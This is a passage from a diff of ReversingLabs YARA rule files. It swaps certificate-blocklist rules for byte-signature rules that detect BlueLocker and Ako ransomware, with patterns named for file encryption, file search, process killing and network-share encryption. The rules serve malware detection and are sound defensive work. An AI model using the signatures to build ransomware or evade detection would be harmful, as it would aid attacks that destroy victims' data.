8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + } + $enum_resources_call = { + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D + 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? + 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B C8 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 8D 4D ?? E8 ?? + ?? ?? ?? 8D 55 ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KBK, OOO" and pe.signatures[i].serial=="4b:47:d1:8d:be:a5:7a:bd:15:63:dd:f8:9f:87:a6:c2" and 1590485607<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($kill_processes_call) and ($kill_processes) and ($enum_resources) and ( all of ($search_files_*)) and ( all of ($encrypt_files_p*)) and ($enum_resources_call) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Be41E2C7Bb2493044B9241Abb732599D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Bluelocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BlueLocker ransomware." author = "ReversingLabs" - id = "81e5a8f3-0893-534a-ab4f-5c2c47078b40" - date = "2023-11-08" - modified = "2023-11-08" + id = "145ff05e-c90d-598a-a3d5-220bd6df718a" + date = "2022-08-04" + modified = "2022-08-04" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4178-L4196" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "eb5d94b80fd030d14dc26878895c61761825f3c77209ca0280e88dcd1800f9c2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BlueLocker.yara#L1-L130" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fbe5f246f4554e63b5da6a0aca169e8221a84fce18fd437ae7ad9b068e9ca576" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BlueLocker" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 8B 75 ?? 57 + 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 89 55 ?? 89 75 ?? + 89 45 ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 + ?? ?? ?? ?? 8B 55 ?? 33 C9 0B C8 89 55 ?? 89 4D ?? 83 FB ?? 75 ?? 0B C3 5F 5E 5B 8B + 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B + F0 FF 15 ?? ?? ?? ?? 33 C9 03 F0 83 C6 ?? 0F 92 C1 F7 D9 0B CE 51 E8 ?? ?? ?? ?? 8B + F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF 75 ?? + 56 E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 0F 8C ?? ?? + ?? ?? 8B 45 ?? 0F 8F ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 C9 0F 8F ?? ?? + ?? ?? 7C ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D + 4D ?? D1 E8 89 45 ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 + } + $encrypt_files_p2 = { + 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B + C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? + 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? + 0B C8 53 89 4D ?? FF D7 33 F6 8D 45 ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? FF 75 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 53 FF D7 6A + ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8B 45 ?? 03 F0 3B 75 ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 6A ?? 8D + 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? + ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 73 ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B + 3D ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B 3D + ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F + } + $encrypt_files_p3 = { + 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? + ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 + 4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 + 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? 0B C8 53 89 4D ?? FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? + 6A ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 85 C0 74 ?? FF 75 ?? BA ?? ?? ?? ?? + 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 + 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 81 7D ?? ?? ?? ?? ?? 72 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 + 85 C0 75 ?? 8B 75 ?? 6A ?? 0F 57 C0 6A ?? 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF D7 + 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 89 55 ?? C7 + 45 ?? ?? ?? ?? ?? 85 D2 74 ?? 8B FA B9 ?? ?? ?? ?? F3 A5 8B 4D ?? 68 ?? ?? ?? ?? 8B + 01 8B 49 ?? 89 82 ?? ?? ?? ?? 8D 45 ?? 50 52 6A ?? 6A ?? 6A ?? FF 75 ?? 89 8A ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF 15 + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 EB ?? 83 CE ?? 85 DB 74 ?? 53 FF 15 ?? + ?? ?? ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 E8 ?? ?? ?? ?? 8B + 4D ?? 83 C4 ?? 8B C6 33 CD 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $find_files_p1 = { + FF 74 B4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 46 83 + FE ?? 7C ?? FF 74 24 ?? FF D7 68 ?? ?? ?? ?? 8B F0 FF D7 03 F0 8D 84 24 ?? ?? ?? ?? + 6A ?? 50 FF D7 8D 0C 06 33 C0 83 C1 ?? 0F 92 C0 F7 D8 0B C1 50 E8 ?? ?? ?? ?? 8B F0 + 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 ?? ?? ?? + ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? + ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? + 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? 83 C7 ?? 57 FF 15 ?? ?? ?? + ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 85 C9 74 ?? 8B 54 24 ?? C7 01 ?? ?? ?? + ?? C7 41 ?? ?? ?? ?? ?? 83 7A ?? ?? 75 ?? 89 4A ?? 89 4A ?? 57 89 31 FF 15 ?? ?? ?? + ?? E9 ?? ?? ?? ?? 8B 42 ?? 89 48 ?? 8B 42 ?? 8B 40 ?? 89 42 ?? 89 30 57 FF 15 ?? ?? + ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 B4 ?? 8D 84 24 + } + $find_files_p2 = { + 50 FF D3 85 C0 0F 85 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 6A ?? FF 74 24 ?? FF D7 8B F0 8D + 84 24 ?? ?? ?? ?? 50 FF D7 03 F0 33 C0 83 C6 ?? 0F 92 C0 F7 D8 0B C6 50 E8 ?? ?? ?? + ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 + E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 56 E8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? E8 ?? ?? + ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 EB ?? 57 68 ?? ?? ?? + ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? + 85 C0 74 ?? 8B 54 24 ?? 53 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? + 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 8B 35 ?? ?? + ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 + } + $create_crypt_context = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? + ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 C8 ?? 8B 4D ?? 33 CD E8 ?? ?? ?? + ?? 8B E5 5D C2 ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 6A ?? 50 FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF + D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 75 ?? + 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 68 ?? ?? ?? ?? 56 6A ?? + FF 15 ?? ?? ?? ?? 8D 45 ?? 89 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D + 04 45 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? + ?? ?? ?? 85 C0 75 ?? 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 8B 45 ?? 5E 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? + 33 C0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Company Babylon" and (pe.signatures[i].serial=="00:be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" or pe.signatures[i].serial=="be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d") and 1589146251<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($create_crypt_context) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_15C5Af15Afecf1C900Cbab0Ca9165629 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ako ransomware." author = "ReversingLabs" - id = "de734943-e735-5895-b76e-5f8588a77540" - date = "2023-11-08" - modified = "2023-11-08" + id = "fce98a6a-f7bd-52ee-a2b8-31b48f6134ca" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4198-L4214" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5c54f32dbac271b2b60ec40bd052b5566a512cd2bcb4255057b21262806882d2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Ako.yara#L1-L173" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8321a4ace66ae48e3a6896daf02c184fa7767fa6bd10cd83b322ad01698008cf" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ako" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_win64_p1 = { + 44 89 4C 24 ?? 4C 89 44 24 ?? 48 89 54 24 ?? 48 89 4C 24 ?? 56 57 48 81 EC ?? ?? ?? + ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? + 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 83 BC 24 ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? + ?? 41 B9 ?? ?? ?? ?? 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 90 89 44 24 ?? 81 7C 24 ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 84 24 + ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA + 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? 32 + C0 E9 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 + ?? 45 33 C0 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 45 33 C0 BA ?? ?? ?? ?? + 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 + 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + 48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 C7 44 24 ?? ?? ?? ?? + ?? EB ?? 48 8B 44 24 ?? 48 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 + 39 44 24 ?? 0F 8D ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? + 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 33 D2 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 + B8 ?? ?? ?? ?? 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 + } + $encrypt_files_win64_p2 = { + 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 45 33 C9 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 + 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? + ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? 05 ?? ?? + ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ?? ?? ?? ?? 48 8D 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 48 03 C1 48 89 44 24 ?? 33 D2 48 8D 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B F8 48 8B 44 24 ?? 48 8B F0 B9 ?? ?? ?? ?? F3 A4 48 + 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? + ?? 4C 8B C8 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 90 0F B6 C0 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 + 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B 44 24 ?? + 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 + 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F + B6 44 24 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? E9 ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA + } + $encrypt_files_win64_p3 = { + 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B + F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 41 B9 ?? ?? ?? + ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B C8 E8 + ?? ?? ?? ?? 90 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 + 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 24 ?? 44 8B C1 48 8B D0 48 8B 8C + 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 48 89 44 24 + ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 3B C8 0F + 85 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? + C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B + 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 41 + B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 + 85 C0 74 ?? 8B 44 24 ?? 48 83 F8 ?? 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? C6 44 + 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 90 0F B6 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 + ?? ?? ?? ?? 5F 5E C3 + } + $encrypt_network_shares_win64_p1 = { + 48 89 54 24 ?? 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B + 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 84 24 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 8B C8 E8 + ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? 